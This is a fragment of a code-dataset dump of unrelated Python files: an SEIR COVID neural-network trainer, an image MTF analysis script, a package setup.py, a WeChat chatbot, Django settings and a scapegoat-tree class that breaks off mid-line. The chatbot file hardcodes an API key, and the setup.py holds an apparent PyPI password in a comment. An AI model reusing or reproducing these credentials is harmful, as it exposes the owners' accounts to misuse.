temp_rnn2t = gamma * I_NN\r\n\r\n if str.lower(R['loss_function']) == 'l2_loss':\r\n # LossS_Net_obs = tf.reduce_mean(tf.square(S_NN - S_observe))\r\n # LossE_Net_obs = tf.reduce_mean(tf.square(E_NN - E_observe))\r\n LossI_Net_obs = tf.reduce_mean(tf.square(I_NN - I_observe))\r\n # LossR_Net_obs = tf.reduce_mean(tf.square(R_NN - R_observe))\r\n LossN_Net_obs = tf.reduce_mean(tf.square(N_NN - N_observe))\r\n\r\n Loss2dS = tf.reduce_mean(tf.square(dS_NN2t - temp_snn2t))\r\n Loss2dE = tf.reduce_mean(tf.square(dE_NN2t - temp_enn2t))\r\n Loss2dI = tf.reduce_mean(tf.square(dI_NN2t - temp_inn2t))\r\n Loss2dR = tf.reduce_mean(tf.square(dR_NN2t - temp_rnn2t))\r\n Loss2dN = tf.reduce_mean(tf.square(dN_NN2t))\r\n elif str.lower(R['loss_function']) == 'lncosh_loss':\r\n # LossS_Net_obs = tf.reduce_mean(tf.ln(tf.cosh(S_NN - S_observe)))\r\n # LossE_Net_obs = tf.reduce_mean(tf.log(tf.cosh(E_NN - E_observe)))\r\n LossI_Net_obs = tf.reduce_mean(tf.log(tf.cosh(I_NN - I_observe)))\r\n # LossR_Net_obs = tf.reduce_mean(tf.log(tf.cosh(R_NN - R_observe)))\r\n LossN_Net_obs = tf.reduce_mean(tf.log(tf.cosh(N_NN - N_observe)))\r\n\r\n Loss2dS = tf.reduce_mean(tf.log(tf.cosh(dS_NN2t - temp_snn2t)))\r\n Loss2dE = tf.reduce_mean(tf.log(tf.cosh(dE_NN2t - temp_enn2t)))\r\n Loss2dI = tf.reduce_mean(tf.log(tf.cosh(dI_NN2t - temp_inn2t)))\r\n Loss2dR = tf.reduce_mean(tf.log(tf.cosh(dR_NN2t - temp_rnn2t)))\r\n Loss2dN = tf.reduce_mean(tf.log(tf.cosh(dN_NN2t)))\r\n\r\n if R['regular_weight_model'] == 'L1':\r\n regular_WB2S = DNN_base.regular_weights_biases_L1(Weight2S, Bias2S)\r\n regular_WB2E = DNN_base.regular_weights_biases_L1(Weight2E, Bias2E)\r\n regular_WB2I = DNN_base.regular_weights_biases_L1(Weight2I, Bias2I)\r\n regular_WB2R = DNN_base.regular_weights_biases_L1(Weight2R, Bias2R)\r\n elif R['regular_weight_model'] == 'L2':\r\n regular_WB2S = DNN_base.regular_weights_biases_L2(Weight2S, Bias2S)\r\n regular_WB2E = DNN_base.regular_weights_biases_L2(Weight2E, Bias2E)\r\n regular_WB2I = DNN_base.regular_weights_biases_L2(Weight2I, Bias2I)\r\n regular_WB2R = DNN_base.regular_weights_biases_L2(Weight2R, Bias2R)\r\n else:\r\n regular_WB2S = tf.constant(0.0)\r\n regular_WB2E = tf.constant(0.0)\r\n regular_WB2I = tf.constant(0.0)\r\n regular_WB2R = tf.constant(0.0)\r\n\r\n PWB2E = wb_penalty * regular_WB2E\r\n PWB2S = wb_penalty * regular_WB2S\r\n PWB2I = wb_penalty * regular_WB2I\r\n PWB2R = wb_penalty * regular_WB2R\r\n\r\n Loss2S = Loss2dS + PWB2S\r\n Loss2E = Loss2dE + PWB2E\r\n Loss2I = predict_true_penalty * LossI_Net_obs + Loss2dI + PWB2I\r\n Loss2R = Loss2dR + PWB2R\r\n Loss2All = LossN_Net_obs + Loss2dN\r\n\r\n my_optimizer = tf.train.AdamOptimizer(in_learning_rate)\r\n train_Loss2S = my_optimizer.minimize(Loss2S, global_step=global_steps)\r\n train_Loss2E = my_optimizer.minimize(Loss2E, global_step=global_steps)\r\n train_Loss2I = my_optimizer.minimize(Loss2I, global_step=global_steps)\r\n train_Loss2R = my_optimizer.minimize(Loss2R, global_step=global_steps)\r\n train_Loss2All = my_optimizer.minimize(Loss2All, global_step=global_steps)\r\n train_Loss = tf.group(train_Loss2S, train_Loss2E, train_Loss2I, train_Loss2R, train_Loss2All)\r\n\r\n t0 = time.time()\r\n loss_s_all, loss_e_all, loss_i_all, loss_r_all, loss_n_all = [], [], [], [], []\r\n test_epoch = []\r\n test_mse2I_all, test_rel2I_all = [], []\r\n\r\n # filename = 'data2csv/Italia_data.csv'\r\n filename = 'data2csv/Korea_data.csv'\r\n date, data = RNN_data.load_csvData(filename)\r\n assert (trainSet_szie + test_size2batch <= len(data))\r\n\r\n train_date, train_data, test_date, test_data = \\\r\n RNN_data.split_csvData2train_test(date, data, size2train=trainSet_szie, normalFactor=R['total_population'])\r\n\r\n if R['total_population'] != 1:\r\n Have_normal = True\r\n NormalFactor = 1.0\r\n else:\r\n Have_normal = False\r\n NormalFactor = R['total_population']\r\n\r\n if R['total_population'] == 1:\r\n ndata2train = np.ones(train_size2batch, dtype=np.float32) * float(9776000)\r\n else:\r\n ndata2train = np.ones(train_size2batch, dtype=np.float32)\r\n\r\n # 对于时间数据来说,验证模型的合理性,要用连续的时间数据验证\r\n test_t_bach = RNN_data.sample_testDays_serially(test_date, test_size2batch)\r\n i_obs_test = RNN_data.sample_testData_serially(test_data, test_size2batch, NormalFactor)\r\n\r\n # ConfigProto 加上allow_soft_placement=True就可以使用 gpu 了\r\n config = tf.ConfigProto(allow_soft_placement=True) # 创建sess的时候对sess进行参数配置\r\n config.gpu_options.allow_growth = True # True是让TensorFlow在运行过程中动态申请显存,避免过多的显存占用。\r\n config.allow_soft_placement = True # 当指定的设备不存在时,允许选择一个存在的设备运行。比如gpu不存在,自动降到cpu上运行\r\n with tf.Session(config=config) as sess:\r\n sess.run(tf.global_variables_initializer())\r\n tmp_lr = learning_rate\r\n for i_epoch in range(R['max_epoch'] + 1):\r\n t_batch, i_obs = RNN_data.randSample_Normalize_existData(train_date, train_data, batchsize=train_size2batch,\r\n normalFactor=NormalFactor)\r\n n_obs = ndata2train.reshape(train_size2batch, 1)\r\n tmp_lr = tmp_lr * (1 - lr_decay)\r\n train_option = True\r\n if R['activate_stage_penalty'] == 1:\r\n if i_epoch < int(R['max_epoch'] / 10):\r\n temp_penalty_pt = pt_penalty_init\r\n elif i_epoch < int(R['max_epoch'] / 5):\r\n temp_penalty_pt = 10 * pt_penalty_init\r\n elif i_epoch < int(R['max_epoch'] / 4):\r\n temp_penalty_pt = 50 * pt_penalty_init\r\n elif i_epoch < int(R['max_epoch'] / 2):\r\n temp_penalty_pt = 100 * pt_penalty_init\r\n elif i_epoch < int(3 * R['max_epoch'] / 4):\r\n temp_penalty_pt = 200 * pt_penalty_init\r\n else:\r\n temp_penalty_pt = 500 * pt_penalty_init\r\n elif R['activate_stage_penalty'] == 2:\r\n if i_epoch < int(R['max_epoch'] / 3):\r\n temp_penalty_pt = pt_penalty_init\r\n elif i_epoch < 2 * int(R['max_epoch'] / 3):\r\n temp_penalty_pt = 10 * pt_penalty_init\r\n else:\r\n temp_penalty_pt = 50 * pt_penalty_init\r\n else:\r\n temp_penalty_pt = pt_penalty_init\r\n\r\n _, loss_s, loss_e, loss_i, loss_r, loss_n, pwb2s, pwb2e, pwb2i, pwb2r = sess.run(\r\n [train_Loss, Loss2S, Loss2E, Loss2I, Loss2R, Loss2All, PWB2S, PWB2E, PWB2I, PWB2R],\r\n feed_dict={T_it: t_batch, I_observe: i_obs, N_observe: n_obs, in_learning_rate: tmp_lr,\r\n train_opt: train_option, predict_true_penalty: temp_penalty_pt})\r\n\r\n loss_s_all.append(loss_s)\r\n loss_e_all.append(loss_e)\r\n loss_i_all.append(loss_i)\r\n loss_r_all.append(loss_r)\r\n loss_n_all.append(loss_n)\r\n\r\n if i_epoch % 1000 == 0:\r\n print_and_log2train(i_epoch, time.time() - t0, tmp_lr, temp_penalty_pt, pwb2s, pwb2e, pwb2i, pwb2r,\r\n loss_s, loss_e, loss_i, loss_r, loss_n, log_out=log_fileout)\r\n test_epoch.append(i_epoch / 1000)\r\n train_option = False\r\n s_nn2test, e_nn2test, i_nn2test, r_nn2test, alpha_test, beta_test, gamma_test = sess.run(\r\n [S_NN, E_NN, I_NN, R_NN, alpha, beta, gamma], feed_dict={T_it: test_t_bach, train_opt: train_option})\r\n point_ERR2I = np.square(i_nn2test - i_obs_test)\r\n test_mse2I = np.mean(point_ERR2I)\r\n test_mse2I_all.append(test_mse2I)\r\n test_rel2I = test_mse2I / np.mean(np.square(i_obs_test))\r\n test_rel2I_all.append(test_rel2I)\r\n\r\n saveData.save_SEIR_trainLoss2mat_Covid(loss_s_all, loss_e_all, loss_i_all, loss_r_all, loss_n_all,\r\n actName=act_func, outPath=R['FolderName'])\r\n\r\n plotData.plotTrain_loss_1act_func(loss_s_all, lossType='loss2s', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_e_all, lossType='loss2e', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_i_all, lossType='loss2i', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_r_all, lossType='loss2r', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_n_all, lossType='loss2n', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n\r\n saveData.save_testMSE_REL2mat(test_mse2I_all, test_rel2I_all, actName='Infected', outPath=R['FolderName'])\r\n plotData.plotTest_MSE_REL(test_mse2I_all, test_rel2I_all, test_epoch, actName='Infected', seedNo=R['seed'],\r\n outPath=R['FolderName'], yaxis_scale=True)\r\n saveData.save_SEIR_testSolus2mat_Covid(s_nn2test, e_nn2test, i_nn2test, r_nn2test, name2solus1='snn2test',\r\n name2solus2='enn2test', name2solus3='inn2test', name2solus4='rnn2test',\r\n outPath=R['FolderName'])\r\n saveData.save_SEIR_testParas2mat_Covid(alpha_test, beta_test, gamma_test, name2para1='alpha2test',\r\n name2para2='beta2test', name2para3='gamma2test',\r\n outPath=R['FolderName'])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n R = {}\r\n R['gpuNo'] = 0 # 默认使用 GPU,这个标记就不要设为-1,设为0,1,2,3,4....n(n指GPU的数目,即电脑有多少块GPU)\r\n\r\n # 文件保存路径设置\r\n store_file = 'SEIR2covid'\r\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n sys.path.append(BASE_DIR)\r\n OUT_DIR = os.path.join(BASE_DIR, store_file)\r\n if not os.path.exists(OUT_DIR):\r\n print('---------------------- OUT_DIR ---------------------:', OUT_DIR)\r\n os.mkdir(OUT_DIR)\r\n\r\n R['seed'] = np.random.randint(1e5)\r\n seed_str = str(R['seed']) # int 型转为字符串型\r\n FolderName = os.path.join(OUT_DIR, seed_str) # 路径连接\r\n R['FolderName'] = FolderName\r\n if not os.path.exists(FolderName):\r\n print('--------------------- FolderName -----------------:', FolderName)\r\n os.mkdir(FolderName)\r\n\r\n # ---------------------------------------- 复制并保存当前文件 -----------------------------------------\r\n if platform.system() == 'Windows':\r\n tf.compat.v1.reset_default_graph()\r\n shutil.copy(__file__, '%s/%s' % (FolderName, os.path.basename(__file__)))\r\n else:\r\n shutil.copy(__file__, '%s/%s' % (FolderName, os.path.basename(__file__)))\r\n\r\n # if the value of step_stop_flag is not 0, it will activate stop condition of step to kill program\r\n step_stop_flag = input('please input an integer number to activate step-stop----0:no---!0:yes--:')\r\n R['activate_stop'] = int(step_stop_flag)\r\n # if the value of step_stop_flag is not 0, it will activate stop condition of step to kill program\r\n R['max_epoch'] = 200000\r\n if 0 != R['activate_stop']:\r\n epoch_stop = input('please input a stop epoch:')\r\n R['max_epoch'] = int(epoch_stop)\r\n\r\n R['eqs_name'] = 'SEIR'\r\n R['input_dim'] = 1 # 输入维数,即问题的维数(几元问题)\r\n R['output_dim'] = 1 # 输出维数\r\n\r\n # ------------------------------------ 神经网络的设置 ----------------------------------------\r\n R['size2train'] = 70 # 训练集的大小\r\n R['batch_size2train'] = 20 # 训练数据的批大小\r\n R['batch_size2test'] = 10 # 训练数据的批大小\r\n\r\n R['init_penalty2predict_true'] = 50 # Regularization parameter for boundary conditions\r\n R['activate_stage_penalty'] = 1 # 是否开启阶段调整边界惩罚项\r\n if R['activate_stage_penalty'] == 1 or R['activate_stage_penalty'] == 2:\r\n R['init_penalty2predict_true'] = 1\r\n\r\n # R['regular_weight_model'] = 'L0'\r\n # R['regular_weight_model'] = 'L1'\r\n R['regular_weight_model'] = 'L2' # The model of regular weights and biases\r\n # R['regular_weight'] = 0.000 # Regularization parameter for weights\r\n R['regular_weight'] = 0.001 # Regularization parameter for weights\r\n\r\n if 50000 < R['max_epoch']:\r\n R['learning_rate'] = 2e-4 # 学习率\r\n R['lr_decay'] = 5e-5 # 学习率 decay\r\n elif (20000 < R['max_epoch'] and 50000 >= R['max_epoch']):\r\n R['learning_rate'] = 1e-4 # 学习率\r\n R['lr_decay'] = 5e-5 # 学习率 decay\r\n else:\r\n R['learning_rate'] = 5e-5 # 学习率\r\n R['lr_decay'] = 1e-5 # 学习率 decay\r\n R['optimizer_name'] = 'Adam' # 优化器\r\n # R['loss_function'] = 'L2_loss'\r\n R['loss_function'] = 'lncosh_loss'\r\n\r\n # R['hidden_layers'] = (10, 10, 8, 6, 6, 3) # it is used to debug our work\r\n R['hidden_layers'] = (80, 80, 60, 40, 40, 20)\r\n # R['hidden_layers'] = (100, 100, 80, 60, 60, 40)\r\n # R['hidden_layers'] = (200, 100, 100, 80, 50, 50)\r\n # R['hidden_layers'] = (300, 200, 200, 100, 80, 80)\r\n # R['hidden_layers'] = (400, 300, 300, 200, 100, 100)\r\n # R['hidden_layers'] = (500, 400, 300, 200, 200, 100, 100)\r\n # R['hidden_layers'] = (600, 400, 400, 300, 200, 200, 100)\r\n # R['hidden_layers'] = (1000, 500, 400, 300, 300, 200, 100, 100)\r\n\r\n # 网络模型的选择\r\n # R['model'] = 'PDE_DNN'\r\n # R['model'] = 'PDE_DNN_BN'\r\n # R['model'] = 'PDE_DNN_scaleOut'\r\n R['model'] = 'PDE_DNN_Fourier'\r\n\r\n # 激活函数的选择\r\n # R['act_name'] = 'relu'\r\n # R['act_name'] = 'tanh'\r\n # R['act_name'] = 'leaky_relu'\r\n # R['act_name'] = 'srelu'\r\n R['act_name'] = 's2relu'\r\n # R['act_name'] = 'slrelu'\r\n # R['act_name'] = 'elu'\r\n # R['act_name'] = 'selu'\r\n # R['act_name'] = 'phi'\r\n\r\n R['total_population'] = 9776000\r\n # R['total_population'] = 1\r\n\r\n solve_SEIR2COVID(R)\r\n","sub_path":"SEIR_RNN.py","file_name":"SEIR_RNN.py","file_ext":"py","file_size_in_byte":26961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188093293","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 20 16:42:38 2017\n\nThis method detects a region within an image on which to perform MTF analysis.\n\n@author: Gus\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\" Settings \"\"\"\ntarget_path_vert = \"C:/Users/Gus/Documents/GitHub/testing_code/target2.PNG\"\nimage_path = \"C:/Users/Gus/Documents/GitHub/testing_code/vid_image2.jpg\"\n# image_path = \"C:/Users/Gus/Documents/GitHub/testing_code/target2.PNG\"\n\ndef TEST():\n vertical = True\n pixel_pitch_mm = 2.2/1000\n raw_image = cv2.imread(image_path)\n grey_image = grey_img(raw_image)\n target_coords = find_target(grey_image, vert = vertical, display = True)\n roi = grab_roi(target_coords[0],target_coords[1],grey_image)\n # cv2.imshow(\"ROI\", roi)\n upline, downline = grab_line(roi, vert = vertical)\n MTF_curve(upline, pixel_pitch_mm)\n \ndef find_target(grey_image, vert = True, num_scales = 10, display = False):\n templ = cv2.imread(target_path_vert)\n templ = cv2.cvtColor(templ, cv2.COLOR_BGR2GRAY)\n if not vert:\n templ = cv2.transpose(templ)\n templ = cv2.flip(templ,1)\n \n img2 = grey_image\n\n method = cv2.TM_CCORR_NORMED\n \n scales = np.geomspace(0.1,10,num_scales)\n \n best_max = 0\n best_match = None\n \n for scale in scales:\n resiz = cv2.resize(templ, (0,0), fx = scale, fy = scale)\n \n if resiz.shape[0] > img2.shape[0] or resiz.shape[1] > img2.shape[1]:\n continue\n # Step 2: Get the size of the template. This is the same size as the match.\n trows,tcols = resiz.shape[:2]\n\n img = img2.copy()\n \n result = cv2.matchTemplate(resiz, img, method)\n \n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n\n # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n MPx,MPy = min_loc\n else:\n MPx,MPy = max_loc\n \n if max_val > best_max:\n best_max = max_val\n best_match = [(MPx,MPy),(MPx+tcols,MPy+trows)]\n \n if best_match is None:\n return None\n \n # Step 3: Draw the rectangle on large_image\n cv2.rectangle(img2, best_match[0], best_match[1],(0,0,255),2)\n \n small= cv2.resize(img2, (0,0), fx = 0.5, fy = 0.5)\n \n if display:\n cv2.imshow(\"Matches\", small)\n \n return best_match\n\ndef grey_img(image):\n if len(image.shape) is 3:\n return cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n return image\n\ndef grab_roi(corner1, corner2, grey_image):\n x1 = corner1[1]\n y1 = corner1[0]\n x2 = corner2[1]\n y2 = corner2[0]\n if x2>x1 and y2>y1:\n return grey_image[x1:x2,y1:y2]\n if x2>x1 and not y2>y1:\n return grey_image[x1:x2,y2:y1]\n if not x2>x1 and y2>y1:\n return grey_image[x2:x1,y1:y2]\n else:\n return grey_image[x2:x1,y2:y1]\n \ndef grab_line(roi_image, vert = True):\n # trim ROI to only include the tilted thing\n L,W = roi_image.shape\n roi_image = roi_image[int(0.2*L):int(0.8*L),int(0.2*W):int(0.8*W)]\n #cv2.imshow(\"trimmed ROI\", roi_image)\n \n if vert:\n roi_image = cv2.transpose(roi_image)\n \n sums = np.sum(roi_image, 1)\n sums = sums.astype(float)\n norm_sums = (sums-min(sums))/(max(sums)-min(sums))\n norm_diff = np.ediff1d(norm_sums)\n \n # find the points closest to half way\n inds = (np.abs(norm_sums-0.5)).argsort()\n \n upline = None\n downline = None\n \n for ind in inds:\n if upline is not None and downline is not None:\n break\n if upline is None:\n if norm_diff[ind] > 0:\n upline = roi_image[ind,:]\n if downline is None:\n if norm_diff[ind] < 0:\n downline = roi_image[ind,:]\n\n# plt.plot(norm_sums)\n# plt.figure()\n# plt.plot(norm_diff)\n# plt.figure()\n# plt.plot(upline)\n# plt.plot(downline)\n# plt.show()\n return upline, downline\n \ndef MTF_curve(line, pixel_pitch_mm):\n sfr = line\n sfr = sfr/max(sfr)\n plt.figure(\"sfr\")\n plt.plot(sfr)\n \n lsf = np.diff(sfr)\n # lsf = np.absolute(lsf)\n plt.plot(lsf)\n \n mtf = np.absolute(np.fft.fft(lsf))\n freq = np.fft.fftfreq(mtf.shape[0])\n spac_freq = freq/pixel_pitch_mm\n mtf = mtf[freq>0]\n spac_freq = spac_freq[freq>0]\n plt.figure(\"mtf\")\n plt.plot(spac_freq,mtf)\n\nif __name__ == \"__main__\":\n sums = TEST()","sub_path":"Organized/_Image_Detect.py","file_name":"_Image_Detect.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149181716","text":"from distutils.core import setup\n\n# PS3intGkXcEGKjw\n# python setup.py sdist\n# twine upload --skip-existing dist/*\n\nSOURCE_CODE_DOWNLOAD_URL = 'https://github.com/NyAinaLorenzo/DataFrameManipulator/archive/v_0.6.1.zip'\nVERSION = '0.6.1'\n\nsetup(\n name='DataFrameManipulator', # How you named your package folder (MyLib)\n packages=['DataFrameManipulator'], # Chose the same as \"name\"\n version=VERSION, # Start with a small number and increase it with every change you make\n license='MIT', # Chose a license from here: https://help.github.com/articles/licensing-a-repository\n description='Used on top of pandas', # Give a short description about your library\n author='Lolo RAM', # Type in your name\n author_email='lolo.ramaromanana@gmail.com', # Type in your E-Mail\n url='https://github.com/NyAinaLorenzo/DataFrameManipulator',\n # Provide either the link to your github or to your website\n download_url=SOURCE_CODE_DOWNLOAD_URL,\n # I explain this later on\n keywords=['DATAFRAME', 'MANIPULATION'], # Keywords that define your package best\n install_requires=[ # I get to this in a second\n 'sklearn',\n 'joblib',\n 'numpy',\n 'pandas',\n 'requests',\n 'boto3'\n ],\n classifiers=[\n 'Development Status :: 3 - Alpha',\n # Chose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\n 'Intended Audience :: Developers', # Define that your audience are developers\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: MIT License', # Again, pick a license\n 'Programming Language :: Python :: 3', # Specify which python versions that you want to support\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n)\n","sub_path":"pypi_install_script/DataFrameManipulator-0.6.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"375957596","text":"import requests\nimport itchat\nimport json\nfrom wxpy import *\n\ntulingKey = 'eeaa98347259474a865d3aad734d859c'\nitchat = Bot(cache_path=False)\nfriend = itchat.friends().search(name=u'湖南中业金服不聊工作群')\n\ndef get_response(msg):\n apiUrl = 'http://openapi.tuling123.com/openapi/api/v2'\n data = {\n \"reqType\": 0,\n \"perception\": {\n \"inputText\": {\n \"text\": msg['Text']\n },\n \"selfInfo\": {\n \"location\": {\n \"city\": \"广东\",\n \"province\": \"深圳\",\n \"street\": \"南山\"\n }\n\n }\n },\n \"userInfo\": {\n \"apiKey\": tulingKey,\n \"userId\": 20180931\n }\n }\n try:\n r = requests.post(apiUrl, data=json.dumps(data)).json()\n print(r)\n return r['results'][0]['values']['text']\n except:\n return\n\n\n@itchat.msg_register(itchat.content.TEXT)\ndef tuling_reply(msg):\n defaultReply = '呵呵'\n print(msg['Text'])\n reply = get_response(msg)\n # 可以自己更改回复前缀\n return reply or defaultReply\n\nif __name__ == \"__main__\":\n embed()","sub_path":"python-syx/work/wx/groupTalk.py","file_name":"groupTalk.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23897563","text":"import json\n\nname = input(\"Имя: \")\nphone = input(\"Телефон: \")\n\ndef create_json():\n json_data = [{\n \"name\": name,\n \"phone\": phone\n }]\n with open('users.json', 'w') as file:\n file.write(json.dumps(json_data, indent=2, ensure_ascii=False))\ncreate_json()\n\ndef add_to_json():\n json_data = {\n \"name\": name,\n \"phone\": phone,\n }\n data = json.load(open(\"users.json\"))\n data.append(json_data)\n with open(\"users.json\", \"w\") as file:\n json.dump(data, file, indent=2, ensure_ascii=False)\n\nadd_to_json()\n","sub_path":"bots/test_json/write_to_json.py","file_name":"write_to_json.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"211546127","text":"\"\"\"@file permute_stacker.py\ncontains the PermuteStacker class\"\"\"\n\nimport tensorflow as tf\nimport model\nimport numpy as np\nimport itertools\n\n\nclass PermuteStacker(model.Model):\n\t\"\"\"Returns a model that permutes along a given dimension and stacks along a different dimension\"\"\"\n\n\tdef _get_outputs(self, inputs, input_seq_length=None, is_training=None):\n\t\t\"\"\"\n\t\tpermutes and stacks the inputs\n\n\t\tArgs:\n\t\t\tinputs: the inputs to concatenate, this is a list of\n\t\t\t\t[batch_size x time x ...] tensors and/or [batch_size x ...] tensors\n\t\t\tinput_seq_length: None\n\t\t\tis_training: None\n\n\t\tReturns:\n\t\t\t- outputs, the reshaped input\n\t\t\"\"\"\n\n\t\tpermute_dim = int(self.conf['permute_dim'])\n\t\tstack_dim = int(self.conf['stack_dim'])\n\n\t\t# code not available for multiple inputs!!\n\t\tif len(inputs) > 1:\n\t\t\traise 'The implementation of PermuteStacker expects 1 input and not %d' % len(inputs)\n\t\telse:\n\t\t\tinput = inputs[0]\n\n\t\twith tf.variable_scope(self.scope):\n\t\t\tpermute_dim_size = input.get_shape()[permute_dim]\n\t\t\tpermutations = list(itertools.permutations(range(permute_dim_size), permute_dim_size))\n\n\t\t\tall_inp_perms = [tf.gather(input, perm, axis=permute_dim) for perm in permutations]\n\t\t\toutput = tf.concat(all_inp_perms, axis=stack_dim)\n\n\t\treturn output\n","sub_path":"nabu/neuralnetworks/models/permute_stacker.py","file_name":"permute_stacker.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"52722655","text":"# Production Django settings\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'freezers', # Or path to database file if using sqlite3.\n 'USER': 'cjrogers',\n # 'PASSWORD': '',\n # 'HOST': '', # Set to empty string for localhost.\n # 'PORT': '', # Set to empty string for default.\n }\n}\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = 'http://127.0.0.1:8000/resources/'\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = 'http://127.0.0.1:8000/static/'\n","sub_path":"Freezers3/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217293377","text":"import sys\nimport os\nimport math\nimport random\n\nclass Node:\n\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\nclass Tree:\n\n def __init__(self, alpha):\n self.root = None\n self.tree_size = 0\n self.max_node_count = 0;\n self.alpha = alpha\n\n # Prints a tree using inorder traversal\n def print_tree(self):\n lst = []\n self.inorder(lst, self.root)\n print(lst)\n\n # Equation used to check if a rebuild is triggered (depth > alpha_Log(tree_size))\n def alpha_log(self, size):\n return math.log(size, 1/self.alpha)\n\n # Builds a list of nodes in sorted order\n def inorder(self, lst, root):\n if root is None:\n return\n self.inorder(lst, root.left)\n lst.append(root)\n self.inorder(lst, root.right)\n\n # Returns the number of nodes in a sub-tree\n def size(self, node):\n if node is None:\n return 0\n return self.size(node.left) + self.size(node.right) + 1\n\n # Builds a binary search tree from a sorted list of Nodes\n def build_tree(self, arr):\n if not arr:\n return None\n \n mid = int(len(arr)/2)\n root = arr[mid]\n root.left = self.build_tree(arr[:mid])\n root.right = self.build_tree(arr[mid+1:])\n return root\n\n # Inserts an element into the tree. If the inserted node is too deep,\n # a rebuild is triggered by finding the top-level node that has uneven left\n # and right braches and rebuilding the tree.\n def insert(self, val):\n if self.root is None:\n self.root = Node(val)\n self.tree_size += 1\n else:\n\n depth = 0\n current = self.root\n prev = None\n\n parent_list = []\n\n # Find position to insert new node\n while current != None:\n parent_list.append(current)\n prev = current\n if current.val > val:\n current = current.left\n else:\n current = current.right\n depth += 1\n\n if prev.val > val:\n prev.left = Node(val)\n else:\n prev.right = Node(val)\n\n self.tree_size += 1\n self.max_node_count = max(self.tree_size, self.max_node_count)\n\n # Node is too deep, rebuild tree\n if depth > math.floor(self.alpha_log(self.tree_size) + 1):\n print(\"rebuild triggered after inserting\", val)\n\n scapegoat = None\n scapegoat_index = 0\n \n # Find highest level scapegoat node\n for i in range(1, len(parent_list)):\n ancestor = parent_list[i]\n alpha_size = self.size(ancestor) * self.alpha\n if self.size(ancestor.left) <= alpha_size and self.size(ancestor.right) <= alpha_size:\n continue\n else:\n scapegoat = ancestor\n scapegoat_index = i\n break\n \n # Found top-level scapegoat node, rebuild subtree\n print(\"Scapegoat is\", scapegoat.val)\n sg_parent = parent_list[scapegoat_index-1]\n node_list = []\n self.inorder(node_list, scapegoat)\n new_root = self.build_tree(node_list)\n \n if sg_parent.left == scapegoat:\n sg_parent.left = new_root\n else:\n sg_parent.right = new_root\n\n\n # Returns the minimum node in a subtree\n def find_min(self, node):\n current = node\n while current.left is not None:\n current = current.left\n return current\n\n\n # Deletes a node in the tree and rebuilds the entire tree if the\n # updated size is less than or equal to the max size times alpha.\n def delete(self, val):\n self.delete_node(val, self.root)\n self.tree_size -= 1\n\n\n # Auxiliary function for delete()\n def delete_node(self, val, node):\n if node is None:\n return None\n \n if node.val < val:\n node.right = self.delete_node(val, node.right)\n elif node.val > val:\n node.left = self.delete_node(val, node.left)\n else:\n if node.left is None:\n return node.right\n if node.right is None:\n return node.left\n\n # Replace node to be deleted with successor node \n temp = self.find_min(node.right)\n print(\"min is\", temp.val)\n node.val = temp.val\n node.right = self.delete_node(temp.val, node.right)\n\n # Delete triggered rebuild of entire tree\n if self.tree_size <= self.alpha * self.max_node_count:\n print(\"Delete triggered rebuild of entire tree\")\n node_list = []\n self.inorder(node_list, self.root)\n self.root = self.build_tree(node_list)\n return self.root\n else:\n return node\n\n\n # Returns True if the value is found in the tree, False otherwise.\n def search(self, val):\n if self.root is None:\n return false\n else:\n\n current = self.root\n while current != None:\n if current.val > val:\n current = current.left\n elif current.val < val:\n current = current.right\n else:\n return True\n return False\n\n\n# Pretty print a tree\ndef print_tree(node, level):\n if node is not None:\n print_tree(node.left, level+4)\n print(\" \"*level, node.val)\n print_tree(node.right, level+4)\n\n \ndef main():\n \n try:\n file = open(\"tree.txt\", mode=\"r\")\n except:\n print(\"File must be named 'tree.txt'\")\n sys.exit(1)\n\n cmd_list = [line.rstrip(\"\\n\").replace(\",\", \"\") for line in file]\n t = 